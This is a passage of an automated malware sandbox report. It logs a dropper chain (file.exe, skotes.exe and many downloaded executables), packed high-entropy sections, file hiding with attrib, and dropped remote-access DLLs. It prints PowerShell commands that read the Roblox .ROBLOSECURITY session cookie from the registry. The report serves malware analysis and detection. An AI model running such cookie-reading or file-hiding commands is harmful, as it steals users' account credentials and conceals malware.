                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 3.2.skotes.exe.690000.0.unpack :EW;.rsrc:W;.idata :W;uyplpdnx:EW;lxepjdzt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;uyplpdnx:EW;lxepjdzt:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 89.2.skotes.exe.690000.0.unpack :EW;.rsrc:W;.idata :W;uyplpdnx:EW;lxepjdzt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;uyplpdnx:EW;lxepjdzt:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeUnpacked PE file: 96.2.d188864e84.exe.a00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;uzxdwyvi:EW;efzdldig:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;uzxdwyvi:EW;efzdldig:EW;.taggant:EW;
                                Suspicious powershell command line found
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                Source: random[4].exe1.3.drStatic PE information: 0x94370F66 [Sun Oct 18 12:19:50 2048 UTC]
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline"
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8AA6EE0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,6_2_00007FF8A8AA6EE0
                                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeFile created: C:\Users\Public\Netstat\__tmp_rar_sfx_access_check_4404468
                                Source: fde98a8d0b.exe.3.drStatic PE information: real checksum: 0x2caf1f should be: 0x2c9c57
                                Source: random[2].exe.3.drStatic PE information: real checksum: 0x1f4c52 should be: 0x1fe410
                                Source: random[1].exe.3.drStatic PE information: real checksum: 0x1d2d25 should be: 0x1d6b7c
                                Source: f7b3852b06.exe.3.drStatic PE information: real checksum: 0x1b6453 should be: 0x1a94f6
                                Source: random[1].exe1.3.drStatic PE information: real checksum: 0x1ceb69 should be: 0x1dabc0
                                Source: random[2].exe0.3.drStatic PE information: real checksum: 0x0 should be: 0x6066
                                Source: random[3].exe.3.drStatic PE information: real checksum: 0x1cccfc should be: 0x1d2879
                                Source: random[4].exe0.3.drStatic PE information: real checksum: 0x1b6453 should be: 0x1a94f6
                                Source: random[4].exe1.3.drStatic PE information: real checksum: 0x0 should be: 0x14b59
                                Source: db75e03f4b.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x324fc1
                                Source: random[3].exe0.3.drStatic PE information: real checksum: 0x2caf1f should be: 0x2c9c57
                                Source: file.exeStatic PE information: real checksum: 0x2efd64 should be: 0x2f41c0
                                Source: 97d4b1071f.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x14b59
                                Source: random[1].exe0.3.drStatic PE information: real checksum: 0x0 should be: 0x11353a
                                Source: skotes.exe.0.drStatic PE information: real checksum: 0x2efd64 should be: 0x2f41c0
                                Source: d188864e84.exe.3.drStatic PE information: real checksum: 0x1d2d25 should be: 0x1d6b7c
                                Source: a4439a2887.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x11353a
                                Source: cb947ba4b8.exe.3.drStatic PE information: real checksum: 0x1f4c52 should be: 0x1fe410
                                Source: random[4].exe2.3.drStatic PE information: real checksum: 0x0 should be: 0x324fc1
                                Source: f8645e1e85.exe.3.drStatic PE information: real checksum: 0x1cccfc should be: 0x1d2879
                                Source: file.exeStatic PE information: section name:
                                Source: file.exeStatic PE information: section name: .idata
                                Source: file.exeStatic PE information: section name: uyplpdnx
                                Source: file.exeStatic PE information: section name: lxepjdzt
                                Source: file.exeStatic PE information: section name: .taggant
                                Source: skotes.exe.0.drStatic PE information: section name:
                                Source: skotes.exe.0.drStatic PE information: section name: .idata
                                Source: skotes.exe.0.drStatic PE information: section name: uyplpdnx
                                Source: skotes.exe.0.drStatic PE information: section name: lxepjdzt
                                Source: skotes.exe.0.drStatic PE information: section name: .taggant
                                Source: random[1].exe.3.drStatic PE information: section name:
                                Source: random[1].exe.3.drStatic PE information: section name: .idata
                                Source: random[1].exe.3.drStatic PE information: section name:
                                Source: random[1].exe.3.drStatic PE information: section name: uzxdwyvi
                                Source: random[1].exe.3.drStatic PE information: section name: efzdldig
                                Source: random[1].exe.3.drStatic PE information: section name: .taggant
                                Source: random[3].exe.3.drStatic PE information: section name:
                                Source: random[3].exe.3.drStatic PE information: section name: .idata
                                Source: random[3].exe.3.drStatic PE information: section name:
                                Source: random[3].exe.3.drStatic PE information: section name: speiiqif
                                Source: random[3].exe.3.drStatic PE information: section name: suzusvsz
                                Source: random[3].exe.3.drStatic PE information: section name: .taggant
                                Source: f8645e1e85.exe.3.drStatic PE information: section name:
                                Source: f8645e1e85.exe.3.drStatic PE information: section name: .idata
                                Source: f8645e1e85.exe.3.drStatic PE information: section name:
                                Source: f8645e1e85.exe.3.drStatic PE information: section name: speiiqif
                                Source: f8645e1e85.exe.3.drStatic PE information: section name: suzusvsz
                                Source: f8645e1e85.exe.3.drStatic PE information: section name: .taggant
                                Source: random[3].exe0.3.drStatic PE information: section name:
                                Source: random[3].exe0.3.drStatic PE information: section name: .idata
                                Source: random[3].exe0.3.drStatic PE information: section name: ygtpparq
                                Source: random[3].exe0.3.drStatic PE information: section name: zzjdxvxy
                                Source: random[3].exe0.3.drStatic PE information: section name: .taggant
                                Source: fde98a8d0b.exe.3.drStatic PE information: section name:
                                Source: fde98a8d0b.exe.3.drStatic PE information: section name: .idata
                                Source: fde98a8d0b.exe.3.drStatic PE information: section name: ygtpparq
                                Source: fde98a8d0b.exe.3.drStatic PE information: section name: zzjdxvxy
                                Source: fde98a8d0b.exe.3.drStatic PE information: section name: .taggant
                                Source: random[4].exe0.3.drStatic PE information: section name:
                                Source: random[4].exe0.3.drStatic PE information: section name: .idata
                                Source: random[4].exe0.3.drStatic PE information: section name:
                                Source: random[4].exe0.3.drStatic PE information: section name: efaooxfi
                                Source: random[4].exe0.3.drStatic PE information: section name: covnxbgl
                                Source: random[4].exe0.3.drStatic PE information: section name: .taggant
                                Source: d188864e84.exe.3.drStatic PE information: section name:
                                Source: d188864e84.exe.3.drStatic PE information: section name: .idata
                                Source: d188864e84.exe.3.drStatic PE information: section name:
                                Source: d188864e84.exe.3.drStatic PE information: section name: uzxdwyvi
                                Source: d188864e84.exe.3.drStatic PE information: section name: efzdldig
                                Source: d188864e84.exe.3.drStatic PE information: section name: .taggant
                                Source: f7b3852b06.exe.3.drStatic PE information: section name:
                                Source: f7b3852b06.exe.3.drStatic PE information: section name: .idata
                                Source: f7b3852b06.exe.3.drStatic PE information: section name:
                                Source: f7b3852b06.exe.3.drStatic PE information: section name: efaooxfi
                                Source: f7b3852b06.exe.3.drStatic PE information: section name: covnxbgl
                                Source: f7b3852b06.exe.3.drStatic PE information: section name: .taggant
                                Source: random[1].exe1.3.drStatic PE information: section name:
                                Source: random[1].exe1.3.drStatic PE information: section name: .idata
                                Source: random[1].exe1.3.drStatic PE information: section name:
                                Source: random[1].exe1.3.drStatic PE information: section name: xnuzvlhe
                                Source: random[1].exe1.3.drStatic PE information: section name: tzuttanx
                                Source: random[1].exe1.3.drStatic PE information: section name: .taggant
                                Source: random[2].exe.3.drStatic PE information: section name:
                                Source: random[2].exe.3.drStatic PE information: section name: .idata
                                Source: random[2].exe.3.drStatic PE information: section name:
                                Source: random[2].exe.3.drStatic PE information: section name: fhxxuwls
                                Source: random[2].exe.3.drStatic PE information: section name: vzpihbtm
                                Source: random[2].exe.3.drStatic PE information: section name: .taggant
                                Source: cb947ba4b8.exe.3.drStatic PE information: section name:
                                Source: cb947ba4b8.exe.3.drStatic PE information: section name: .idata
                                Source: cb947ba4b8.exe.3.drStatic PE information: section name:
                                Source: cb947ba4b8.exe.3.drStatic PE information: section name: fhxxuwls
                                Source: cb947ba4b8.exe.3.drStatic PE information: section name: vzpihbtm
                                Source: cb947ba4b8.exe.3.drStatic PE information: section name: .taggant
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0027D91C push ecx; ret 0_2_0027D92F
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00271359 push es; ret 0_2_0027135A
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_006AD91C push ecx; ret 2_2_006AD92F
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006E062C push 00000000h; ret 3_2_006E063C
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006E1296 push 00000000h; ret 3_2_006E1298
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006E1716 push 00000000h; ret 3_2_006E1718
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006AD91C push ecx; ret 3_2_006AD92F
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006ADFC6 push ecx; ret 3_2_006ADFD9
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A863A154 push rsp; ret 6_2_00007FF8A863A155
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8639193 push rdi; iretd 6_2_00007FF8A8639195
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A863A2D5 push rsp; retf 6_2_00007FF8A863A2D6
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A86392D4 push r10; retf 6_2_00007FF8A8639340
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8639BF2 push rsp; retf 6_2_00007FF8A8639BF3
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8636C11 push r10; ret 6_2_00007FF8A8636C13
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8636CDA push rdx; ret 6_2_00007FF8A8636CE1
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8636CE6 push r12; ret 6_2_00007FF8A8636CE8
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8636CBC push r8; ret 6_2_00007FF8A8636CC9
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A863A499 push rdx; ret 6_2_00007FF8A863A4F0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8639D75 push rsp; iretq 6_2_00007FF8A8639D76
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A863854C push rbp; retf 6_2_00007FF8A8638565
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8636DEB push rsp; ret 6_2_00007FF8A8636DF3
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8638597 push r12; ret 6_2_00007FF8A86385D3
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8638E56 push rbp; iretq 6_2_00007FF8A8638E57
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8636E34 push rdi; iretd 6_2_00007FF8A8636E36
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8638EEE push r12; ret 6_2_00007FF8A8638F15
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8636EC0 push r12; ret 6_2_00007FF8A8636EDE
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8636EA6 push r10; retf 6_2_00007FF8A8636EA9
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8636E8B push rsi; ret 6_2_00007FF8A8636E8C
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8636E7C push rsp; iretd 6_2_00007FF8A8636E7D
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8638F43 push r12; iretd 6_2_00007FF8A8638F5A
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8636F44 push r8; ret 6_2_00007FF8A8636F4C
                                Source: file.exeStatic PE information: section name: entropy: 7.986412821940457
                                Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.986412821940457
                                Source: random[1].exe.3.drStatic PE information: section name: entropy: 7.974324170155358
                                Source: random[1].exe.3.drStatic PE information: section name: uzxdwyvi entropy: 7.955304664762435
                                Source: random[3].exe.3.drStatic PE information: section name: entropy: 7.9808008709140585
                                Source: random[3].exe.3.drStatic PE information: section name: speiiqif entropy: 7.953421574141461
                                Source: f8645e1e85.exe.3.drStatic PE information: section name: entropy: 7.9808008709140585
                                Source: f8645e1e85.exe.3.drStatic PE information: section name: speiiqif entropy: 7.953421574141461
                                Source: random[4].exe0.3.drStatic PE information: section name: entropy: 7.822208608300262
                                Source: random[4].exe0.3.drStatic PE information: section name: efaooxfi entropy: 7.952428212119931
                                Source: d188864e84.exe.3.drStatic PE information: section name: entropy: 7.974324170155358
                                Source: d188864e84.exe.3.drStatic PE information: section name: uzxdwyvi entropy: 7.955304664762435
                                Source: f7b3852b06.exe.3.drStatic PE information: section name: entropy: 7.822208608300262
                                Source: f7b3852b06.exe.3.drStatic PE information: section name: efaooxfi entropy: 7.952428212119931
                                Source: random[1].exe0.3.drStatic PE information: section name: .text entropy: 7.73440914387992
                                Source: a4439a2887.exe.3.drStatic PE information: section name: .text entropy: 7.73440914387992
                                Source: random[1].exe1.3.drStatic PE information: section name: entropy: 7.983709808349382
                                Source: random[1].exe1.3.drStatic PE information: section name: xnuzvlhe entropy: 7.953847578299681
                                Source: random[2].exe.3.drStatic PE information: section name: entropy: 7.976124615911012
                                Source: random[2].exe.3.drStatic PE information: section name: fhxxuwls entropy: 7.952193964481426
                                Source: cb947ba4b8.exe.3.drStatic PE information: section name: entropy: 7.976124615911012
                                Source: cb947ba4b8.exe.3.drStatic PE information: section name: fhxxuwls entropy: 7.952193964481426

                                Persistence and Installation Behavior

                                barindex
                                Uses attrib.exe to hide files
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"
                                Uses cmd line tools excessively to alter registry or file data
                                Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: attrib.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeProcess created: attrib.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeFile created: C:\Users\Public\Netstat\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017915001\712b285aaa.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI51602\sqlite3.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017921001\85070a414c.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017906001\3b81e6737d.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI51602\select.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[2].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\m9sfEU9[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[2].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017920001\194df6b68b.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeFile created: C:\Users\Public\Netstat\msvcr100.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI51602\_lzma.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[3].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017913001\97d4b1071f.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[3].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeFile created: C:\Users\Public\Netstat\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI51602\_ssl.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI51602\_sqlite3.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI51602\VCRUNTIME140.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[4].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\D1UL0FG[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017903001\cb947ba4b8.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[4].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017907001\90ddd682ad.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017911001\67fbb282d1.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017905001\4dd01d90fc.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI51602\_decimal.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI51602\_hashlib.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeFile created: C:\Users\Public\Netstat\FuturreApp.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI51602\_queue.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeFile created: C:\Users\Public\Netstat\PCICHEK.DLLJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017919001\b8dc7af2d8.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[3].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017910001\fde98a8d0b.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017917001\7423465717.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[5].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI51602\libcrypto-1_1.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017912001\f7b3852b06.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\8ZVMneG[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017904001\97bf9e137e.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI51602\_socket.pydJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI51602\_ctypes.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI51602\libffi-7.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI51602\libssl-1_1.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeFile created: C:\Users\Public\Netstat\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017901001\a4439a2887.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017918001\d2256ee69b.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI51602\_bz2.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017916001\UZAj8wc.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[4].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017908001\2c36247645.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\UZAj8wc[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI51602\python310.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeFile created: C:\Users\Public\Netstat\pcicapi.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI51602\unicodedata.pydJump to dropped file
